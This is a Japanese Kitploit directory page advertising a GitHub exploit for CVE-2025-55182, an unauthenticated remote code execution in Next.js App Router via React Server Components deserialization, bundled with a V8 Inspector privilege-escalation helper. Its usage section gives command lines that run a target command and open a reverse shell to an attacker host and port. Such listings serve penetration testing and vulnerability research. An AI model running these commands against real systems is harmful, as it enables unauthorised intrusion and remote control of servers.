Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — CVE-2025-55182 用のスタンドアロンエクスプロイト。React Server Components Flight の逆シリアル化を介して Next.js App Router で認証なしの RCE を実現し、リバースシェルと Node.js V8 Inspector 権限昇格ヘルパーを備えています。 | Kitploit
ツール/GitHubGitHub/r3vpwnx/cve-2025-55182
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 用のスタンドアロンエクスプロイト。React Server Components Flight の逆シリアル化を介して Next.js App Router で認証なしの RCE を実現し、リバースシェルと Node.js V8 Inspector 権限昇格ヘルパーを備えています。

リポジトリを見る
1日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 - React2Shell (CVE-2025-55182) React Server Components Flight の逆シリアル化による認証不要のRCE

React Server Componentsを有効化したNext.js App RouterアプリケーションにおけるCVE-2025-55182のスタンドアロンエクスプロイトです。サーバーアクションエンドポイントに細工したRSC Flightペイロードを送信することで、認証不要のリモートコード実行が可能になります。process.mainModule.requireサンドボックスバイパスを介して特権プロセス内でコードを実行する、Node.js V8 Inspector(デバッグポート)のローカル権限昇格ヘルパーも同梱されています。

CVE: CVE-2025-55182

要件

root@kitploit:~
python3 -m pip install requests    # Python PoC用

使用方法

cdp_privesc.py

root@kitploit:~
python3 cdp_privesc.py <ターゲット>

react2shell-poc.py(RSC RCE — ベンダー提供、クレジット参照)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # エラーベースのコマンド外部送信
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

参考情報

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

クレジット

react2shell-poc.py はp3ta00氏が公開したCVE-2025-55182のPoCであり、自己完結型チェーンのために https://github.com/p3ta00/react2shell-poc から変更を加えずにベンダー提供しています。 cdp_privesc.py(Node.js V8 Inspectorのローカル権限昇格)はオリジナルです。

免責事項

認可されたセキュリティテストおよび教育目的のみに使用してください。このツールは、所有しているシステム、または明示的な書面による許可を得たシステムに対してのみ実行してください。


著者: r3vpwnx

ツールをダウンロード